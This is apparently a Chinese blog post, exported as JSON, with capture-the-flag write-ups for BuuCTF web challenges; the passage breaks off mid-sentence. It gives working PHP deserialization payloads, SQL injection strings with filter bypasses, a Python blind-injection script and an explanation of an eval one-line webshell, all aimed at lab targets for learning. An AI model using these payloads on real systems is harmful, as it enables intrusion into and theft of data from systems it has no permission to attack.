{"id":95,"date":"2023-08-17T12:48:18","date_gmt":"2023-08-17T12:48:18","guid":{"rendered":"http:\/\/mikuhacker.cn\/wp-blog\/?p=95"},"modified":"2025-03-18T22:25:42","modified_gmt":"2025-03-18T14:25:42","slug":"buuctf-wp","status":"publish","type":"post","link":"http:\/\/mikuhacker.cn\/?p=95","title":{"rendered":"BuuCTF-WP(\u6301\u7eed\u66f4\u65b0ing~)"},"content":{"rendered":"\n

\u524d\u8a00\uff1a2023\u5e74\u7684\u6691\u5047\uff0c\u51b3\u5b9a\u8981\u6210\u4e3aCTF\u7684Web\u9ad8\u624b\uff0c\u4e8e\u662f\u5c1d\u8bd5\u731b\u5237BuuCTF\u4e0a\u7684\u9898\u76ee\uff0c\u76ee\u6807\u662fAK\u6389BuuCTF\u4e0a\u7684Web\u9898\u3002\u7531\u4e8eBuuCTF\u4e0a\u7684\u9898\u76ee\u8f83\u591a\uff0c\u6240\u4ee5\u53ea\u6311\u90e8\u5206\u9898\u76ee\u5199wp\uff08\u72e0\u72e0\u5730\u5077\u61d2\u3002<\/p>\n\n\n\n

[MRCTF 2020] Ez_bypass<\/h2>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n

\u6253\u5f00\u9776\u673a\u53ef\u4ee5\u76f4\u63a5\u770b\u5230\u6e90\u7801\u3002\u53ef\u77e5\u8981\u5206\u522b\u901a\u8fc7get\u65b9\u5f0f\u83b7\u53d6id\u548cgg\u7684\u503c\u5e76\u6bd4\u8f83\u5b83\u4eec\u7684md5\u503c\u662f\u5426\u76f8\u7b49\uff0c\u7136\u540e\u518d\u901a\u8fc7post\u65b9\u5f0f\u5f97\u5230\u975e\u6570\u5b57\u7684passwd\u503c\u5e76\u4e0e’1234567’\u6bd4\u8f83\u5224\u65ad\u662f\u5426\u76f8\u7b49\u3002\u9996\u5148\u7531\u4e8ephp\u662f\u5f31\u7c7b\u578b\u6bd4\u8f83\uff0c\u6240\u4ee5id\u548cgg\u7684\u95ee\u9898\u53ef\u4ee5\u901a\u8fc7md5\u78b0\u649e\u6765\u5b8c\u6210\uff0c\u4e0d\u8fc7\u4e5f\u53ef\u4ee5\u5229\u7528php\u7684\u6bd4\u8f83\u4e0d\u80fd\u5904\u7406\u6570\u7ec4\u7684\u7279\u6027\u6765\u76f4\u63a5\u7ed5\u8fc7 \u5373\uff1a<\/p>\n\n\n\n

?id[]=111&gg[]=222<\/pre>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u53ef\u4ee5\u770b\u5230\u7b2c\u4e00\u6b65\u5df2\u7ecf\u5b8c\u6210\u4e86\uff0c\u63a5\u4e0b\u6765\u662f\u89e3\u51b3passwd\u7684\u95ee\u9898\u3002\u65e2\u8981\u6ee1\u8db3passwd=1234567\uff0c\u53c8\u8981\u8ba9passwd\u4e0d\u662f\u6570\u5b57\uff0c\u90a3\u5c31\u57281234567\u540e\u9762\u8865\u4e00\u4e2a\u5b57\u7b26\u5c31\u597d\u4e86\u3002\u5373\uff1apasswd=1234567a<\/p>\n\n\n\n
\u7531\u4e8ephp\u662f\u5f31\u7c7b\u578b\u6bd4\u8f83\uff0c\u6240\u4ee5\u6b64\u65f6passwd==1234567\u6210\u7acb<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u62ff\u5230flag<\/p>\n\n\n\n
[\u7f51\u9f0e\u676f 2020] \u9752\u9f99\u7ec4 AreUSerialz 1<\/h2>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u6253\u5f00\u56fe\u7247\u5c31\u53ef\u4ee5\u770b\u51fa\u662f\u4e00\u9053\u53cd\u5e8f\u5217\u5316\u9898\u76ee\u3002\u53bb\u6389\u4e0d\u9700\u8981\u770b\u7684_construct\u548cwrite\u51fd\u6570\uff0c\u53ea\u770b\u5176\u4f59\u7684\u51fd\u6570\u4ee5\u53ca\u4e3b\u51fd\u6570\u53ef\u4ee5\u77e5\u9053\u5f53op=2\u65f6\u4f1a\u8c03\u7528read\u51fd\u6570\u6765\u8bfb\u53d6file_name\u6587\u4ef6\u7684\u5185\u5bb9\uff0c\u90a3\u4e48\u8ba9file_name=’flag.php’\u5373\u53ef\u3002\u6240\u4ee5\u6784\u9020\u51fapoc\uff1a<\/p>\n\n\n\n
<?php\n\ninclude(\"flag.php\");\n\nclass FileHandler {\n\n    public $op;\n    public $filename;\n    public $content;\n\n}\n$a=new FileHandler;\n$a->op=2;\n$a->filename='flag.php';\n$a->content='';\n$b=serialize($a);\necho $b;\n?><\/code><\/pre>\n\n\n\n
\u8fd0\u884c\u540e\u5f97\u5230\u9700\u8981\u7684payload\uff1a<\/p>\n\n\n\n
O:11:\"FileHandler\":3:{s:2:\"op\";i:2;s:8:\"filename\";s:8:\"flag.php\";s:7:\"content\";s:0:\"\";} <\/pre>\n\n\n\n
\u7531\u4e3b\u51fd\u6570\u53ef\u4ee5\u77e5\u9053\u53d8\u91cfstr\u662f\u53ef\u63a7\u7684\uff0c\u6240\u4ee5\u6700\u7ec8payload\u62fc\u63a5\u597d\u540e\u662f\uff1a<\/p>\n\n\n\n
?str=O:11:\"FileHandler\":3:{s:2:\"op\";i:2;s:8:\"filename\";s:8:\"flag.php\";s:7:\"content\";s:0:\"\";} <\/pre>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u67e5\u770b\u6e90\u7801\u5f97\u5230flag<\/p>\n\n\n\n
[\u6781\u5ba2\u5927\u6311\u6218 2019] PHP<\/h2>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u6253\u5f00\u9776\u673a\u5c31\u63d0\u793a\u4e86\u8981\u627e\u7f51\u7ad9\u7684\u5907\u4efd\u6587\u4ef6\uff0c\u76f4\u63a5\u7528dirsearch\u626b\u4e00\u4e0b<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u53d1\u73b0\u654f\u611f\u6587\u4ef6www.zip<\/strong><\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u4e0b\u8f7d\u5e76\u89e3\u538b\u540e\u5f97\u5230\u51e0\u4e2a\u6587\u4ef6\uff0c\u5176\u4e2dflag.php\u76f4\u63a5\u6253\u5f00\u770b\u4e0d\u5230\u4ec0\u4e48\u4e1c\u897f<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u4eceindex.php\u4e2d\u53ef\u4ee5\u770b\u5230\u4e0a\u9762\u8fd9\u4e32\u4ee3\u7801\uff0c\u8868\u793a\u901a\u8fc7GET\u65b9\u5f0f<\/strong>\u5f97\u5230select\u7684\u503c\u5e76\u5c06\u5176\u53cd\u5e8f\u5217\u5316\u3002\u8bf4\u660e\u53ef\u4ee5\u901a\u8fc7\u4f20\u5165\u5e8f\u5217\u5316\u540e\u7684\u4ee3\u7801\u4f5c\u4e3aselect\u7684\u503c\uff0c\u8ba9\u7a0b\u5e8f\u5c06select\u53cd\u5e8f\u5217\u5316\u540e\u5c06\u4f1a\u6267\u884c\u6211\u4eec\u4f20\u5165\u7684\u4ee3\u7801\uff0c\u4ece\u800c\u5b9e\u73b0\u4efb\u610f\u4ee3\u7801\u6267\u884c\uff08\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\uff09<\/strong><\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u63a5\u7740\u770bclass.php\uff0c\u7531\u4ee3\u7801\u53ef\u77e5\u9700\u8981\u5229\u7528construct\u51fd\u6570<\/strong>\u5206\u522b\u7ed9\u53d8\u91cfusername<\/strong>\u548cpassword<\/strong>\u8d4b\u503c\u4e3aadmin<\/strong>\u3001100<\/strong>\uff0c\u540c\u65f6\u8981\u9632\u6b62\u8c03\u7528wakeup\u51fd\u6570<\/strong>\u5bfc\u81f4username\u88ab\u91cd\u65b0\u8d4b\u503c\u6210guest\u3002\u4e8e\u662f\u6784\u9020\u51fapoc\uff1a<\/p>\n\n\n\n
<?php\n\nclass Name{\n    private $username = 'admin';\n    private $password = '100';\n    }\n\n    $a=new Name();\n    echo serialize($a);\n?><\/code><\/pre>\n\n\n\n
\u8fd0\u884c\u7a0b\u5e8f\u5f97\u5230\u5e8f\u5217\u5316\u540e\u7684\u7ed3\u679c\uff1a<\/p>\n\n\n\n
O:4:\"Name\":2:{s:14:\"Nameusername\";s:5:\"admin\";s:14:\"Namepassword\";s:3:\"100\";}
<\/pre>\n\n\n\n
\u7531\u4e8e\u9700\u8981\u7ed5\u8fc7wakeup\u51fd\u6570\uff0c\u6240\u4ee5\u5229\u7528wakeup\u51fd\u6570\u7684\u4e00\u4e2a\u6f0f\u6d1e\uff1a\u5f53\u5e8f\u5217\u5316\u540e\u7684\u5b57\u7b26\u4e2d\u6807\u660e\u5c5e\u6027\u6570\u91cf\u7684\u503c<\/strong>\u4e0e\u5b9e\u9645\u5c5e\u6027\u6570\u91cf<\/strong>\u4e0d\u4e00\u81f4\u65f6\u4f1a\u5bfc\u81f4\u4e0d\u89e6\u53d1wakeup\u51fd\u6570<\/strong>\uff0c\u6240\u4ee5\u6b64\u5904\u5c06”Name”\u540e\u9762\u76842\u6539\u4e3a\u5176\u5b83\u503c\uff08\u6b64\u5904\u6539\u4e3a3\uff09<\/strong>\u5373\u53ef\u7ed5\u8fc7wakeup\u51fd\u6570\u3002\u540c\u65f6\u7531\u4e8e\u5e8f\u5217\u5316\u540e\u4f1a\u628a\u539f\u672c\u7528\u4e8e\u8868\u793a\u53d8\u91cf\u7684private\u5c5e\u6027<\/strong>\u7684%00\u5b57\u7b26\u5c4f\u853d\u6389\uff0c\u6240\u4ee5\u8981\u5728\u5e8f\u5217\u5316\u7ed3\u679c\u4e2d\u7684\u53d8\u91cf\u524d\u8865\u4e0a\uff0c\u4e8e\u662f\u539f\u5148\u7684\u5e8f\u5217\u5316\u7ed3\u679c\u6539\u4e3a\uff1a<\/p>\n\n\n\n
O:4:\"Name\":3:{s:14:\"%00Name%00username\";s:5:\"admin\";s:14:\"%00Name%00password\";s:3:\"100\";}
<\/pre>\n\n\n\n
\u5df2\u77e5\u53ef\u63a7\u53d8\u91cf\u662fselect<\/strong>\uff0c\u6240\u4ee5\u6700\u7ec8\u7684exp\u662f\uff1a<\/p>\n\n\n\n
?select= O:4:\"Name\":3:{s:14:\"%00Name%00username\";s:5:\"admin\";s:14:\"%00Name%00password\";s:3:\"100\";} <\/pre>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
[\u6781\u5ba2\u5927\u6311\u6218 2019] BuyFlag<\/h2>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u6253\u5f00\u9776\u673a\u540e\u901a\u8fc7MENU\u83dc\u5355\u8bbf\u95ee\u5230pay.php\u754c\u9762\uff0c\u53ef\u4ee5\u770b\u5230\u60f3\u8981\u5f97\u5230flag\u9996\u5148\u9700\u8981\u81ea\u5df1\u7684\u8eab\u4efd<\/strong>\u662fCUIT\u7684\u5b66\u751f\uff0c\u7136\u540e\u9700\u8981\u6b63\u786e\u7684\u5bc6\u7801<\/strong>\uff0c\u540c\u65f6\u9700\u8981100000000MONEY<\/strong>\u6765\u8d2d\u4e70flag\u3002\u4e00\u6b65\u6b65\u6765<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u67e5\u770b\u9875\u9762\u6e90\u7801\u53ef\u4ee5\u770b\u5230\u4e00\u6bb5\u6ce8\u91ca\u5185\u5bb9\uff0c\u63d0\u793a\u901a\u8fc7POST\u65b9\u5f0f<\/strong>\u5f97\u5230password\u7684\u503c\uff0c\u4e14\u8981\u8ba9password\u975e\u6570\u5b57\u540c\u65f6\u7b49\u4e8e404\uff0c\u7531\u4e8ephp\u662f\u5f31\u6bd4\u8f83\u7c7b\u578b\uff0c\u6240\u4ee5\u8ba9password\u4e3a404a\u5373\u53ef\u6ee1\u8db3\u4ee5\u4e0a\u4e24\u4e2a\u8981\u6c42<\/p>\n\n\n\n
\u4f7f\u7528Burpsuit\u5de5\u5177<\/strong>\u6293\u5305\u53ef\u4ee5\u770b\u5230\u8bf7\u6c42\u5305\u4e2d\u7684cookie\u503c<\/strong>\u4e3auser=0\u3002\u53ef\u4ee5\u60f3\u5230\u4ee4user=1\u5373\u53ef\u8868\u793a\u81ea\u5df1\u8eab\u4efd<\/strong>\u4e3aCUIT\u7684student\u3002\u6700\u540e\u4e0d\u8981\u5fd8\u4e86\u7ed9MONEY<\/strong>\u8d4b\u503c\u4e3a100000000<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u7528Burpsuit<\/strong>\u6293\u5305\u540e\u6539\u5305\u4e3a\u4ee5\u4e0a\u503c\u540e\u53d1\u9001\u8bf7\u6c42\u5305<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u9875\u9762\u53d8\u5316\uff0c\u63d0\u793a\u8eab\u4efd\u3001\u5bc6\u7801\u90fd\u5bf9\u4e86\uff0c\u4f46MONEY\u503c\u592a\u957f\u4e86\u3002\u4e8e\u662f\u5c06100000000\u6539\u7528\u79d1\u5b66\u8ba1\u6570\u6cd5\u8868\u793a\u4e3a1e9<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u91cd\u65b0\u53d1\u9001\u8bf7\u6c42\u5305\uff0c\u6210\u529fbuy\u5230flag<\/p>\n\n\n\n
[\u6781\u5ba2\u5927\u6311\u6218 2019] –SQL\u6ce8\u5165\u7cfb\u5217<\/h2>\n\n\n\n
[EasySQL]<\/h3>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u6253\u5f00\u9776\u673a\u770b\u89c1\u767b\u5f55\u754c\u9762\uff0c\u76f4\u63a5\u5c1d\u8bd5\u7528order by [\u6570\u5b57]#<\/strong>\u6765\u67e5\u770b\u80fd\u6ce8\u5165\u7684\u5217\u3002\u6570\u5b57\u4e3a1-3<\/strong>\u7684\u65f6\u5019\u8bf4\u7528\u6237\u540d\u548c\u5bc6\u7801\u9519\u8bef\uff0c\u6570\u5b57\u4e3a4<\/strong>\u65f6\u9875\u9762\u62a5\u9519\uff0c\u8bf4\u660e\u5217\u6570\u4e3a3\u3002\uff08ps. \u2018#<\/strong>\u2019\u5b57\u7b26\u8981\u7528\u5bf9\u5e94\u7684url\u7f16\u7801%23<\/strong>\u6765\u8868\u793a\uff0c\u4e0d\u7136\u4f1a\u62a5\u9519\u3002\u4e00\u4e9b\u5e38\u89c1url\u7f16\u7801\uff1a\u2018 ‘ <\/strong>\u2019\u2014\u2014%27<\/strong>\uff1b\u7a7a\u683c\u2014\u2014%20<\/strong>;\u2018 # <\/strong>\u2019\u2014\u2014%23<\/strong>\u3002<\/p>\n\n\n\n
?username=1&password=1%27order%20by%203%23
?username=1&password=1%27order%20by%204%23 
<\/pre>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u77e5\u9053\u4e3a\u4e09\u5217\u540e\uff0c\u7528union\u8054\u5408\u67e5\u8be2\u8bed\u53e5\u6765\u67e5\u770b\u5217\u5185\u5bb9\uff08union select 1,2,3#)\u5373\u53ef\u5f97\u5230flag<\/p>\n\n\n\n
?username=1&password=1%27union%20select%201,2,3%23<\/pre>\n\n\n\n
[LoveSQL]<\/h3>\n\n\n\n
\u8fd9\u9053\u9898\u4e00\u5f00\u59cb\u89e3\u9898\u6b65\u9aa4\u548c\u4e0a\u9762\u4e00\u6837\uff0c\u4e0d\u8fc7\u4f7f\u7528union select 1,2,3#\u65f6\u51fa\u73b0\u4e0d\u540c\u7ed3\u679c<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u4ece\u56fe\u7247\u53ef\u77e52\u30013\u5217\u5b58\u5728\u6ce8\u5165\u70b9\u3002\u4e8e\u662f\u7ee7\u7eed\u7528\u8054\u5408\u67e5\u8be2\u8bed\u53e5\u8fdb\u884c\u6ce8\u5165\uff0c\u5148\u4ece\u7b2c2\u5217\u5f00\u59cb\u67e5\u8be2<\/p>\n\n\n\n
?username=1&password=1'union select 1,group_concat(schename_name),3 from information_schema.schemata %23
<\/pre>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u53d1\u73b0\u5b58\u5728\u5b57\u7b26\u91cd\u53e0\uff0c\u4e8e\u662f\u6362\u7b2c3\u5217\u8fdb\u884c\u67e5\u8be2<\/p>\n\n\n\n
?username=1&password=1'union select 1,2,group_concat(schema_name) from information_schema.schemata %23
<\/pre>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u67e5\u5230\u51e0\u4e2a\u6570\u636e\u5e93\u540d\uff0c\u9010\u4e00\u67e5\u8be2\u53ef\u77e5flag\u662f\u5728geek\u6570\u636e\u5e93\u4e2d\uff0c\u6b64\u5904\u4fbf\u53ea\u4ee5geek\u7684\u67e5\u8be2\u4f5c\u5b9e\u4f8b\u3002\u73b0\u5728\u5c1d\u8bd5\u67e5\u8be2geek\u6570\u636e\u5e93\u4e2d\u7684\u8868\u540d<\/p>\n\n\n\n
?union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'%23<\/pre>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u63d0\u793a\u4e86password\u662f\u5176\u4e2d\u7684\u5185\u5bb9\uff0c\u9010\u4e00\u5c1d\u8bd5\u53ef\u77e5\u662f\u5728l0ve1sq1\u4e2d\uff08\u7531\u9898\u76ee\u540d\u5b57\u4e5f\u53ef\u4ee5\u731c\u5230\uff09\uff0c\u4f7f\u7528\u5c1d\u8bd5\u4ece\u4e2d\u67e5\u8be2password<\/p>\n\n\n\n
?union select 1,2,group_concat(password) from geek.l0ve1sq1 %23<\/pre>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u627e\u5230flag<\/p>\n\n\n\n
[BabySQL]<\/h3>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u8fdb\u5165\u9898\u76ee\u53ef\u4ee5\u770b\u89c1\u63d0\u793a\u6709\u8fc7\u6ee4\uff0c\u7ecf\u8fc7\u6d4b\u8bd5\u53ef\u4ee5\u53d1\u73b0\u5b58\u5728\u5bf9or\u3001by\u3001union\u3001select\u3001from\u3001where\u5b57\u7b26\u7684\u8fc7\u6ee4\uff0c\u4e8e\u662f\u7528\u53cc\u5199\u6765\u7ed5\u8fc7(\u4f8b\uff1aor\u5199\u6210oorr\uff1bunion\u5199\u6210ununionion)<\/p>\n\n\n\n
?oorrder bbyy 4%23
\/\/\u67e5\u8be2\u5217\u6570
?ununionion seselectlect 1,2,3%23
\/\/\u67e5\u8be2\u53ef\u6ce8\u5165\u7684\u5217
?ununionion seselectlect 1,2,group_concat(schema_name) frofromm infoorrmation_schema.schemata%23
\/\/\u67e5\u8be2\u5e93\u540d
<\/pre>\n\n\n\n
\"\"\/<\/div>
\u5f97\u5230\u5e93\u540d\uff0c\u5176\u4e2d\uff0c\u9010\u4e00\u5c1d\u8bd5\u53ef\u77e5geek\u662f\u6211\u4eec\u8981\u67e5\u7684\u5e93<\/figcaption><\/figure>\n\n\n\n
?ununionion seselectlect 1,2,group_concat(table_name) frofromm infoorrmation_schema.tables whwhereere table_name=geek%23
\/\/\u67e5\u8be2\u8868\u540d<\/pre>\n\n\n\n
\"\"\/<\/div>
\u5f97\u5230\u8868\u540d<\/figcaption><\/figure>\n\n\n\n
\u7531\u9898\u76eeBabySQL\u53ef\u4ee5\u731c\u5230\u8981\u67e5b4bsql\u8868<\/p>\n\n\n\n
?ununionion seselectlect 1,2,group_concat(column_name) from information_schema.columns whewherere table_name='b4bsql'%23
\/\/\u67e5\u8be2b4bsql\u8868\u4e2d\u7684\u5217<\/pre>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u5f97\u5230\u5217\u540d\u540e\uff0c\u67e5\u8be2\u5176\u4e2d\u7684password\u5217\u5f97\u5230flag<\/p>\n\n\n\n
?ununionion seselectlect 1,2,group_concat(passwoorrd) frofromm geek.b4bsql%23<\/pre>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
[HardSQL]<\/h3>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u5c1d\u8bd5\u627e\u6ce8\u5165\u70b9\uff0c\u53d1\u73b0union\u8054\u5408\u67e5\u8be2\u88abban\u4e86\uff0c\u4e8e\u662f\u5c1d\u8bd5\u7528updatexml\u8bed\u53e5\u6765\u8fdb\u884c\u6ce8\u5165<\/p>\n\n\n\n
?username=1&password=1'or(updatexml(1,concat(0x7e,database(),0x7e),1))%23
\/\/\u67e5\u8be2\u5e93\u540d<\/pre>\n\n\n\n
\"\"\/<\/div>
\u5f97\u5230\u5e93\u540d<\/figcaption><\/figure>\n\n\n\n
?username=1&password=1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))%23
\/\/\u67e5\u8be2\u8868\u540d<\/pre>\n\n\n\n
\"\"\/<\/div>
\u5f97\u5230\u8868\u540d<\/figcaption><\/figure>\n\n\n\n
?username=1&password=1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_schema)like(database())),0x7e),1))%23
\/\/\u67e5\u8be2\u5217\u540d
<\/pre>\n\n\n\n
\"\"\/<\/div>
\u5f97\u5230\u5217\u540d<\/figcaption><\/figure>\n\n\n\n
?username=1&password=1'or(updatexml(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1)),0x7e),1))%23
\/\/\u67e5\u8be2password\u5217\u7684\u5185\u5bb9<\/pre>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u53d1\u73b0\u5b57\u7b26\u4e32\u8fc7\u957f\uff0c\u90e8\u5206\u6ca1\u663e\u793a\uff0c\u4e8e\u662f\u7528right\u51fd\u6570\u8fdb\u884c\u4ece\u53f3\u5411\u5de6\u67e5\u8be2\uff0c\u5f97\u5230\u5269\u4f59\u5b57\u7b26<\/p>\n\n\n\n
?username=1&password=1'or(updatexml(1,concat(0x7e,(select(group_concat(right(password,20)))from(H4rDsq1)),0x7e),1))%23
\/\/\u4ece\u53f3\u5411\u5de6\u67e5\u8be220\u4e2a\u5b57\u7b26
<\/pre>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u5f97\u5230\u5269\u4f59\u7684\u5b57\u7b26\u540e\uff0c\u5c06\u4e24\u4e2a\u7ed3\u679c\u62fc\u63a5\u8d77\u6765\u5373\u4e3a\u5b8c\u6574\u7684flag<\/p>\n\n\n\n
[GYCTF 2019] Blacklist<\/h2>\n\n\n\n
\u7528order by 2;#\u548corder by 3;#\u540e\u5224\u65ad\u5217\u6570\u4e3a2\uff0c\u4e8e\u662f\u5c1d\u8bd5\u7528\u8054\u5408\u6ce8\u5165\u67e5\u8be2\uff0c\u4f46\u53d1\u73b0\u5927\u90e8\u5206\u67e5\u8be2\u8bed\u53e5\u88abban\u4e86\u3002<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u5c1d\u8bd5\u7528\u5806\u53e0\u6ce8\u5165 1′;show tables;# \/\/\u67e5\u8be2\u6570\u636e\u5e93\u540d<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u5927\u90e8\u5206\u67e5\u8be2\u8bed\u53e5\u88abban\u4e86\uff0c\u4e8e\u662f\u7528handler\u8bed\u53e5\u8fdb\u884c\u67e5\u8be2<\/p>\n\n\n\n
1';handler FlagHere open;handler FlagHere read first;#<\/pre>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
[CISCN2019] Hack World <\/h2>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u5c1d\u8bd5\u591a\u79cd\u6ce8\u5165\u65b9\u6cd5\uff0c\u90fd\u88abban\u4e86\uff0c\u8f93\u51651’\u53d1\u73b0\u56de\u663ebool()\uff0c\u63a8\u6d4b\u662fbool\u76f2\u6ce8\uff0c\u4e8e\u662f\u5199\u811a\u672c\uff1a<\/p>\n\n\n\n
import requests\n\n#\u5730\u5740\nurl = \"http:\/\/c4a12af1-1130-4825-a153-a480c9bea112.node4.buuoj.cn:81\/index.php\"\n\nresult = \"\"\nnum = 0\nfor i in range(1,60):\n    if num == 1:\n        break\n\n    for j in range(32,128):\n        payload = \"if(ascii(substr((select(flag)from(flag)),%d,1))=%d,1,2)\" % (i,j)\n        print(str((i - 1) * 96 + j - 32) + \":~\" + payload + \"~\")\n\n        data = {\n            \"id\": payload,\n        }\n        \n        r = requests.post(url, data=data)\n\n        r.encoding = r.apparent_encoding\n\n        if \"Hello\" in r.text:\n            x = chr(j)\n            result += str(x)\n            print(result)\n            break\n\n        if \"}\" in result:\n            print(result)\n            num = 1\n            break<\/code><\/pre>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u4f20\u9a6c\u7cfb\u5217<\/h2>\n\n\n\n
[\u6781\u5ba2\u5927\u6311\u6218 2019] Knife<\/h3>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u9898\u76ee\u63d0\u793a\u4e86\u4e00\u6bb5\u6e90\u7801\u201ceval($_POST[“Syc”]);<\/strong>\u201d\uff0c\u8fd9\u662f\u4e2a\u5f88\u5178\u578b\u7684\u4e00\u53e5\u8bdd\u6728\u9a6c\u3002eval<\/strong>\u8868\u793a\u6267\u884c\u62ec\u53f7\u91cc\u7684\u5185\u5bb9\uff08\u7c7b\u4f3c\u7684\u8fd8\u6709exec\u4ee5\u53ca\u7528\u4e8e\u6267\u884c\u7cfb\u7edf\u547d\u4ee4\u7684system\uff09\uff0c\u800c$_POST[“Syc”]\u8868\u793a\u901a\u8fc7POST\u7684\u65b9\u5f0f\u5f97\u5230\u53d8\u91cfSyc\u7684\u503c\uff08\u4e5f\u53ef\u4ee5\u662f$_GET\uff0c\u5373\u901a\u8fc7get\u65b9\u5f0f\u5f97\u5230\u53d8\u91cf\u7684\u503c\uff09\uff0c\u6240\u4ee5\u8fd9\u53e5\u4ee3\u7801\u7684\u610f\u601d\u662f\uff1a\u6267\u884c(eval)\u53d8\u91cfSyc\u7684\u503c\uff0c\u5176\u4e2dSyc\u7684\u503c\u901a\u8fc7POST\u65b9\u5f0f\u5f97\u5230\u3002<\/p>\n\n\n\n
\u6240\u4ee5\u53ea\u8981\u901a\u8fc7POST\u65b9\u5f0f\u628a\u60f3\u8981\u6267\u884c\u7684\u547d\u4ee4\u4f5c\u4e3aSyc\u7684\u503c\u4f20\u5165<\/strong>\uff0c\u5373\u53ef\u5b9e\u73b0\u4efb\u610f\u547d\u4ee4\u6267\u884c\u3002<\/strong><\/p>\n\n\n\n
\u6709\u4e24\u4e2a\u601d\u8def\uff1a1.\u76f4\u63a5\u7528brupsuit\u6216hackbar\u6293\u5305\u540e\u6539\u4e3aPOST\u8bf7\u6c42\u5305\u5e76\u5728\u5305\u4e2d\u52a0\u5165Syc=[\u8981\u6267\u884c\u7684\u547d\u4ee4]\uff08\u6bd4\u5982ls\u3001ls \/\u3001cat flag.php\u3001cat \/flag.php\uff092.\u7528\u4e2d\u56fd\u83dc\u5200\u6216\u8005\u8681\u5251\u7b49\u6728\u9a6c\u5de5\u5177\u8fde\u63a5\u53d8\u91cfSyc\uff0c\u5982\u56fe\uff1a<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
\u8fde\u63a5\u6210\u529f\u540e\u53ef\u4ee5\u901a\u8fc7\u8681\u5251<\/strong>\u6765\u76f4\u63a5\u8bbf\u95ee\u9776\u673a\u7684\u6587\u4ef6\u3001\u670d\u52a1\u5668\u5185\u90e8\uff0c\u4e5f\u53ef\u4ee5\u901a\u8fc7\u8681\u5251\u8fdb\u5165\u7ec8\u7aef\u5bfb\u627eflag<\/p>\n\n\n\n
\"\"\/<\/div><\/figure>\n\n\n\n
[ACTF2020 \u65b0\u751f\u8d5b] Upload<\/h3>\n\n\n\n
\u4ece\u8fd9\u9053\u9898\u5f00\u59cb\u4e86\u89e3\u4f20\u9a6c\u9898\u7684\u57fa\u672c\u89e3\u9898\u601d\u8def\u3002\u4f20\u9a6c\u9898\u7684\u4e00\u4e2a\u660e\u663e\u7279\u5f81\u662f\u6587\u4ef6\u4e0a\u4f20\u529f\u80fd\uff0c\u5f53\u9875\u9762\u6709\u660e\u663e\u7684\u201c\u6587\u4ef6\u4e0a\u4f20\u201d\u6216\u9898\u76ee\u6807\u9898\u5e26upload\u3001\u4e0a\u4f20\u7b49\u5b57\u773c<\/strong>\u65f6\uff0c\u5f80\u5f80\u610f\u5473\u7740\u9700\u8981\u901a\u8fc7\u4e0a\u4f20\u6728\u9a6c\u6587\u4ef6\u6765\u83b7\u53d6shell<\/strong>\uff08\u53ef\u4ee5\u5148\u628ashell\u7406\u89e3\u6210\u4e0a\u4e00\u9053\u9898\u63d0\u5230\u7684\u53ef\u63a7\u53d8\u91cfSyc\uff09\uff0c\u901a\u8fc7shell\uff0c\u6211\u4eec\u53ef\u4ee5\u6267\u884c\u4efb\u610f\u547d\u4ee4\uff0c\u6240\u4ee5\u62ff\u5230shell\u5f80\u5f80\u610f\u5473\u7740\u6211\u4eec\u638c\u63a7\u4e86\u670d\u52a1\u5668\uff08\u5f53\u7136\uff0c\u62ff\u5230\u7684shell\u6709\u53ef\u80fd\u6ca1\u6709\u8f83\u9ad8\u7684\u6743\u9650\u2014\u2014\u6211\u4eec\u7684\u76ee\u6807\u662f\u62ff\u5230ROOT\u6216\u662f\u4e0eROOT\u6709\u540c\u7b49\u6743\u9650\u7684shell\u2014\u2014\u8fd9\u5c31\u9700\u8981\u5b66\u4e60\u63d0\u5347\u6743\u9650\uff08\u63d0